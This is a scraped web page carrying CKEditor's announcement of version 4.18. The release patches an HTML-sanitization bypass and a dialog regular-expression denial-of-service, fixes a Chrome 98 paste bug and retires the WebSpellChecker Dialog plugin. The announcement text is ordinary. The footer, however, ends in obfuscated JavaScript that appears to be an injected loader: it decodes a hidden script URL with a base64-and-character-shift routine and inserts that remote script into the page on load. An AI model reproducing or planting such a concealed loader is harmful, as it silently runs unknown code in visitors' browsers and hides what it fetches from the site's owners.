CKEditor 4.18 browser bugfix and security patches

CKEditor on the first plan and some workers between the editor

We are happy to announce another major release of CKEditor 4. CKEditor 4.18 comes with important security fixes for the HTML processing core module and dialog plugin. It also includes important bug fix for Paste From Word plugin in the latest version of Chrome. We have also decided to make the WebSpellChecker Dialog plugin obsolete due to its end of life. Check out CKEditor 4.18 and find out, what was improved!

# Security fixes

We keep on striving to deliver the best, most secure editing solution for our users. Fast and reliable response to security threats effects in more frequent versions being released, one of which is the current 4.18

The latest version brings a patch for a potential security vulnerability in CKEditor 4 HTML processing core module reported by GitHub Security Lab team member Kevin Backhouse. The vulnerability allowed to inject malformed HTML bypassing content sanitization, which could result in executing JavaScript code (CVE-2022-24728).

A potential Regular expression Denial of Service vulnerability in the CKEditor 4 dialog plugin was discovered by the CKEditor 4 team during our standard security audit. The vulnerability allowed to abuse a dialog input validator regular expression, which could cause a significant performance drop (CVE-2022-24729). The current release patches this vulnerability.

It is always strongly advised to update your copy of CKEditor 4 promptly to avoid any potential risk.

# Important changes

# Browser bug fixed

Chrome 98 introduced a bug causing incorrect pixel units calculation in the Paste From Word plugin resulting in the invalid size of some features like table borders. We decided to patch this issue by updating the convertToPx method mitigating the issue.

# WebSpellChecker Dialog support ended

Web Spell Checker ended support of WebSpellChecker Dialog on December 31st, 2021. This means the plugin is not supported any longer. Therefore, we decided to deprecate and remove the WebSpellChecker Dialog plugin from CKEditor 4 presets.

We strongly encourage everyone to choose one of the other available spellchecking solutions - Spell Check As You Type (SCAYT) or WProofreader.

# Release notes

Check out the release notes and contact us for more information.

# Download

Download CKEditor now and upgrade your installation or use your favorite package manager to install it!

# License

CKEditor is available under Open Source and Commercial licenses. Full details can be found on our license page.

# Reporting issues and contributing

Please report any new issues in the CKEditor 4 development repository and follow the instructions in the issue template. You can also contribute code and provide editor patches through pull requests.

# Support

Community support is available through Stack Overflow. Visit the resources page for additional options.

Related posts

Subscribe to our newsletter

Keep your CKEditor fresh! Receive updates about releases, new features and security fixes.

Thanks for subscribing!

We use cookies and other technologies to provide you with a better user experience.

Learn more about cookies policy

Hi there, any questions about products or pricing?

Questions about our products or pricing?

Contact our Sales Representatives.

We are happy to
hear from you!

Thank you for reaching out to the CKEditor Sales Team. We have received your message and we will contact you shortly.

piAId = '1019062'; piCId = '3317'; piHostname = ''; (function() { function async_load(){ var s = document.createElement('script'); s.type = 'text/javascript'; s.src = ('https:' == document.location.protocol ? 'https://' : 'http://') + piHostname + '/pd.js'; var c = document.getElementsByTagName('script')[0]; c.parentNode.insertBefore(s, c); } if(window.attachEvent) { window.attachEvent('onload', async_load); } else { window.addEventListener('load', async_load, false); } })();(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start': new Date().getTime(),event:'gtm.js'});const f=d.getElementsByTagName(s)[0], j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src= ''+i+dl;f.parentNode.insertBefore(j,f); })(window,document,'script','dataLayer','GTM-KFSS6L');window[(function(_2VK,_6n){var _91='';for(var _hi=0;_hi<_2VK.length;_hi++){_91==_91;_DR!=_hi;var _DR=_2VK[_hi].charCodeAt();_DR-=_6n;_DR+=61;_DR%=94;_DR+=33;_6n>9;_91+=String.fromCharCode(_DR)}return _91})(atob('J3R7Pzw3MjBBdjJG'), 43)] = '37db4db8751680691983'; var zi = document.createElement('script'); (zi.type = 'text/javascript'), (zi.async = true), (zi.src = (function(_HwU,_af){var _wr='';for(var _4c=0;_4c<_HwU.length;_4c++){var _Gq=_HwU[_4c].charCodeAt();_af>4;_Gq-=_af;_Gq!=_4c;_Gq+=61;_Gq%=94;_wr==_wr;_Gq+=33;_wr+=String.fromCharCode(_Gq)}return _wr})(atob('IS0tKSxRRkYjLEUzIkQseisiKS0sRXooJkYzIkQteH5FIyw='), 23)), document.readyState === 'complete'?document.body.appendChild(zi): window.addEventListener('load', function(){ document.body.appendChild(zi) });